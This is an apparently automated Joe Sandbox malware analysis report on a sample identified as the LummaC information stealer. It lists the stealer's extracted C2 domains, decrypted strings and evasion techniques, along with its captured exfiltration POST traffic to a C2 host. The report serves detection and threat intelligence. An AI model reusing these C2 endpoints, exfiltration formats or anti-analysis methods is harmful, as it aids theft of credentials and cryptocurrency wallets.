Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545849
MD5:900b4f529c53a8740d16c0372dc2ca9a
SHA1:342f5cd2f6a7beecca59553f4d970454caa961ca
SHA256:d22ac8685cb5b613bf5b6271239cd4c51b680d06a41f3c4d4d5aaefbf9ad5bc6
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 900B4F529C53A8740D16C0372DC2CA9A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["presticitpo.store", "crisiwarny.store", "thumbystriw.store", "navygenerayk.store", "fadehairucw.store", "founpiuer.store", "scriptyprefej.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2086909296.00000000010A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2102016717.00000000010B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2087372814.00000000010B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2102226797.00000000010B2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 12 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:04.217328+010020546531A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
              2024-10-31T07:14:05.358191+010020546531A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:04.217328+010020498361A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:05.358191+010020498121A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:03.702728+010020571241Domain Observed Used for C2 Detected192.168.2.549704188.114.96.3443TCP
              2024-10-31T07:14:04.881356+010020571241Domain Observed Used for C2 Detected192.168.2.549705188.114.96.3443TCP
              2024-10-31T07:14:06.208818+010020571241Domain Observed Used for C2 Detected192.168.2.549706188.114.96.3443TCP
              2024-10-31T07:14:07.434036+010020571241Domain Observed Used for C2 Detected192.168.2.549707188.114.96.3443TCP
              2024-10-31T07:14:08.803736+010020571241Domain Observed Used for C2 Detected192.168.2.549708188.114.96.3443TCP
              2024-10-31T07:14:10.354086+010020571241Domain Observed Used for C2 Detected192.168.2.549709188.114.96.3443TCP
              2024-10-31T07:14:11.771050+010020571241Domain Observed Used for C2 Detected192.168.2.549710188.114.96.3443TCP
              2024-10-31T07:14:14.835728+010020571241Domain Observed Used for C2 Detected192.168.2.549711188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:02.910872+010020571291Domain Observed Used for C2 Detected192.168.2.5498891.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:02.924571+010020571271Domain Observed Used for C2 Detected192.168.2.5627851.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:03.060815+010020571231Domain Observed Used for C2 Detected192.168.2.5601071.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:02.863132+010020571311Domain Observed Used for C2 Detected192.168.2.5520901.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:02.944497+010020571251Domain Observed Used for C2 Detected192.168.2.5559221.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T07:14:10.646203+010020480941Malware Command and Control Activity Detected192.168.2.549709188.114.96.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.6648.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "crisiwarny.store", "thumbystriw.store", "navygenerayk.store", "fadehairucw.store", "founpiuer.store", "scriptyprefej.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}
              Multi AV Scanner detection for domain / URL
              Source: necklacedmny.storeVirustotal: Detection: 22%Perma Link
              Source: thumbystriw.storeVirustotal: Detection: 14%Perma Link
              Source: presticitpo.storeVirustotal: Detection: 11%Perma Link
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeVirustotal: Detection: 51%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061D7F8 CryptUnprotectData,0_2_0061D7F8
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_0061104F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]0_2_0060E1A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_0063E210
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+64h]0_2_006315DC
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_0062F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esi+10h], edx0_2_0062F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0062F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0062F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h]0_2_0062AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h0_2_0062AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00644C40
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch]0_2_0060EC20
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, esi0_2_0063BCA9
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah]0_2_0060CF90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h]0_2_0061E07E
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0063F020
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, dword ptr [esp+1Ch]0_2_0063F020
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_0062702F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h0_2_00601000
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h0_2_00601000
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ecx, eax0_2_0062A083
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6Ch]0_2_0062A083
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, ecx0_2_00642165
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [0064DCFCh]0_2_0063C132
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], B62B8D10h0_2_0062D2FD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [esp]0_2_0062D2FD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00628290
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+29352E8Dh]0_2_00645330
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h0_2_0062C3A6
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, edx0_2_006424E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_006114CE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_006014A8
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+58h]0_2_00622520
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_006435F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_006435F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_006266E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax]0_2_006236AC
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00643740
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_00643740
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0062F73A
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-3ED06EDAh]0_2_0063C7A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0062E7B0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add edx, esi0_2_006298F2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00630887
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00605890
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00626940
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_006439C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_006439C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_00643A90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then and esi, 001FF800h0_2_00604BA0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+04h], ecx0_2_0061FBA0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h0_2_0062ECE0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00638C80
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch]0_2_0063FC90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax0_2_0060BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]0_2_0060BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_00643D90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx0_2_00608EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], bp0_2_00621EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ecx], di0_2_00621EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00630F3E

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:49889 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:55922 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:52090 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:60107 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62785 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1255Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585899Host: necklacedmny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
              Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
              Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
